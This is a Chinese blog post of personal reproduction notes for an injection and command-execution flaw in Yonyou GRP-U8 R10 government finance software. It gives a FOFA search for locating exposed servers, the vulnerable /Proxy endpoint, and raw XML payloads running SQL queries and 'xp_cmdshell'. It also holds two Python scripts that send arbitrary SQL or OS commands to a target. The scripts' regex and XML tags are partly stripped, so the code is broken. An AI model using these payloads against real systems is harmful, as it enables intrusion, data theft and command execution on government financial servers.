工作中遇到的漏洞,基于前人的复现教程成功复现,记录下自己的复现笔记,如有侵权,请联系我删除
用友GRP-U8R10行政事业财务管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。
该系统被曝存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件。最终产生两种后果,一是可以进行SQL注入,执行SQL语句;二是导致命令执行,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。
fofa搜索语句 title=“GRP-U8”
1、使用hackbar POST方式上传数据包,BrupSuite进行抓包;
漏洞位置:
http://ip:port/Proxy
u8qx/Tindex.jsp
2、抓包后,修改数据包,插入XML语句,这里是执行了sql语句(没必要排版,直接有数据就行,我只是为了好看)
cVer=9.8.0&dp=
<R9PACKET version="1">
<DATAFORMAT>XMLDATAFORMAT>
<R9FUNCTION>
<NAME>AS_DataRequestNAME>
<PARAMS><PARAM>
<NAME>ProviderNameNAME>
<DATA format="text">DataSetProviderDataDATA>
PARAM><PARAM>
<NAME>DataNAME>
<DATA format="text">select user,db_name(),host_name(),@@versionDATA>
PARAM>PARAMS>
R9FUNCTION>
R9PACKET>
cVer=9.8.0&dp=
<R9PACKET version="1">
<DATAFORMAT>XMLDATAFORMAT>
<R9FUNCTION>
<NAME>AS_DataRequestNAME>
<PARAMS><PARAM>
<NAME>ProviderNameNAME>
<DATA format="text">DataSetProviderDataDATA>
PARAM><PARAM>
<NAME>DataNAME>
<DATA format="text">exec xp_cmdshell 'dir'DATA>
PARAM>PARAMS>
R9FUNCTION>
R9PACKET>
GRP-U8_SQLinjection_POC
#!/usr/bin/env python2
#coding:utf-8
import re
import requests
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
if len(sys.argv) != 3:
print "Usage: python poc.py url sql"
sys.exit(1)
url = sys.argv[1]
sql = sys.argv[2]
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded",
}
def poc(url,sql):
url = url + '/Proxy'
print url
data = 'cVer=9.8.0&dp=XML AS_DataRequest ProviderName DataSetProviderDataData ' +sql+''
res = requests.post(url,headers=headers,data=data)
res = res.text
result_row = r'
ROW = re.findall(result_row,res,re.S | re.M)
print '查询成功!'
print ROW[0]
if __name__ == "__main__":
poc(sys.argv[1],sys.argv[2])
GRP-U8_SQLinjection_EXP
#!/usr/bin/env python2
#coding:utf-8
import re
import requests
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
if len(sys.argv) != 3:
print "Usage: python exp.py url cmd"
sys.exit(1)
url = sys.argv[1]
cmd = sys.argv[2]
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded",
}
def exp(url,cmd):
url = url+ '/Proxy'
print url
data = 'cVer=9.8.0&dp=XML AS_DataRequest ProviderName DataSetProviderDataData exec xp_cmdshell \'' +cmd+'\''
res = requests.post(url,headers=headers,data=data)
res = res.text
result_row = r'
'
ROW = re.findall(result_row,res,re.S | re.M)
print '命令执行成功!'
for i in range(len(ROW)):
print ROW[i]
if __name__ == "__main__":
exp(sys.argv[1],sys.argv[2])
https://blog.csdn.net/weixin_44146996/article/details/109863346